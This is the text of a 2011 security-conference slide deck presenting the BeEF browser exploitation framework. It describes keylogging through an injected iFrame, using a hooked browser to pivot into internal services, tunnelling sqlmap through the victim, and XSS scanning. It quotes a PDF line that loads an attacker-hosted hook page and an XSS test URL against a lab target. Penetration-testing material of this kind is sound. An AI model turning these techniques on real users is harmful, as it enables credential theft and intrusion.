Dr. Strangelove or:how I Learned to Stop Worrying and Love the BeEFMichele “antisnatchor” Orru’ 18 September 2011
Who am I?❖ Penetration Tester @ The Royal Bank ofScotland❖ BeEF core developer: - Tunneling Proxy, - XssRays integration, - various exploits, - lot of bug-ﬁxing, testing and fun❖ Kubrick fan❖ Deﬁnitely not a fan of our Italian primeminister Silvio „bunga-bunga” Berlusconi❖@antisnatchor❖http://antisnatchor.com
outline: cutting, devouring and digesting the legs off a browser❖ What the hell is BeEF?❖Cutting - Target enumeration and analysis❖Devouring - Internal net ﬁngerprint - Exploiting internal services through the hooked browser - Keylogging, browser pwnage❖Digesting - Persistence, tunneling sqlmap/Burp through BeEF proxy - XSSrays integration❖Future development and ideas
What the hell is BeEF?❖ BeEF: Browser Exploitation Framework❖Pioneered by Wade Alcorn in 2005 (publicrelease)❖Powerful platform for Client-side pwnage,XSS post-exploitation and generally victimbrowser security-context abuse❖Each browser is likely to be within adifferent security context, and each contextmay provide a set of unique attack vectors.❖ The framework allows the penetrationtester to select speciﬁc modules (in real-time) to target each browser, and thereforeeach context.
Devouring: Internal net ﬁngerprint❖Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011)❖ They developed new BeEF modules❖ They are working with us and their work will be available in BeEF trunk soon.A few examples: ❖Internal DNS enumeration ❖Reliable Port Scanning ❖Ping sweep
Devouring: exploiting internal services❖Network/JbossJmxUploadExploit module Watch „Jboss 6.0.0M1 JMX Deploy Exploit:❖JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploitis available in MSF, but you need to havedirect access to the target (or use a host as apivot) (http://vimeo.com/24410203) the BeEF way... ” on Vimeo❖Then why not use the victim browser as apivot?
Devouring: persistent keylogging❖Persistence/iFrameKeylogger module❖We can inject a 100%width/height overlay iFramethat loads the login page(in-domain), attaching alistener for keyboardevents (keylogger) in JS.❖After the victim logs in,she will stay in the injectediFrame while thecommunication channel willbe persistent in thebackground.
Devouring: module autorun❖ We’ve ported back (from the old PHPversion) the autorun feature❖Add autorun: true in the command moduleconﬁg.yaml that you want to autorun❖When a new browser will be hooked in BeEF,the module will be automatically launched❖Imagine addingautorun: true inMetasploit autopwnmodule (anotherfeature ported back)...
Digesting: hook default browser❖Originally disclosed by Billy (xs-sniper)Rios on „Expanding the Attack Surface”❖Browser/HookDefault module❖We use a PDF in order to attempt hookingthe default browser❖When executed, the hooked browser willload a PDF in a new window and use that tostart the default browser. ❖app.launchURL("http://192.168.56.1/page-With-BeEF- Hook-Js.html",true); ❖If everything will be ok, we hooked the default browser. ❖Future improvements: conﬁgurable bounce page and ruby pdf library
Digesting: tunneling proxy❖Having a communication channel with thehooked browser, we can: ❖Receive requests as a proxy on BeEF ❖Translate these requests to XHRs (in- domain) ❖Parse the XHRs responses and send the data back to the original requestor...
Digesting: tunneling proxy❖Using the victim browser hooked in BeEF as atunneling proxy, we will see the followingscenarios: ❖browsing the authenticated surface of the hooked domain through the security context of the victim browser; ❖spidering the hooked domain through the security context of the victim browser; ❖ﬁnding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
Digesting: tunneling proxy Let see the tunneling proxy in action! (demo time)
Digesting: XssRays❖ Originally developed by Gareth Heyes in2009 as a pure JS-based XSS scanner❖ The XssRays BeEF extension allows you tocheck if links, forms and URI paths of the pagewhere the browser is hooked are vulnerableto XSS.❖What XssRays do is basically parse all thelinks and forms of the page where it is loadedand check for XSS on GET, POST parameters,and also in the URI path.
Digesting: XssRays❖The original code by Gareth, from 2009,used a nice trick (the location.hash fragment)in order to have a sort of callback betweenparent and child iFrames❖This is now patched by all recent browsers. So how to check for XSSs cross- domain, respecting the SOP restrictions?
Digesting: XssRays❖We inject a vector that will contact backBeEF if the JS code will be successfullyexecuted (thus, the XSS conﬁrmed).❖No false positives (oh yes, that’s what Ilike)!❖Basically the document.location.href of theinjected iFrame that contains the vector willpoint to a know BeEF resource. The followingis an example value of href:✴http://192.168.84.1:3000/ui/xssrays/rays?hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection%20double&method=GET
Future dev and ideas❖Improve XssRays: ❖add more attack vectors, more testing ❖add JS depth crawler❖Multi-hooking: a browser can be hooked onmultiple domains❖Check for time-based blind SQLi cross-domain via JS❖Improve the BeEF console (command line UI)❖Well...take a look here: http://code.google.com/p/beef/issues/list
Get in touch with us❖Follow the BeEF: @beefproject❖Checkout BeEF: http://code.google.com/p/beef/❖Check our website: http://beefproject.com❖Have fun with it❖We’re hiring!!! (but we’ll not payyou...seriously, we have so many tasks to do,join us)
Thanks to❖Wade Alcorn and the other BeEF ninjas:Ben, Scotty, Christian, Brendan, Saafan,. .❖My colleagues Piotr & Michal❖My employer❖Hacktivity crew and you attendees